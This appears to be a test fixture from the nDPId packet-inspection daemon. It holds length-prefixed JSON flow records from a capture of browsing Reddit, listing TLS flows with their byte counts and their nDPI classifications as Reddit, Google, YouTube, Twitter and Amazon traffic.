+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} 
+00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
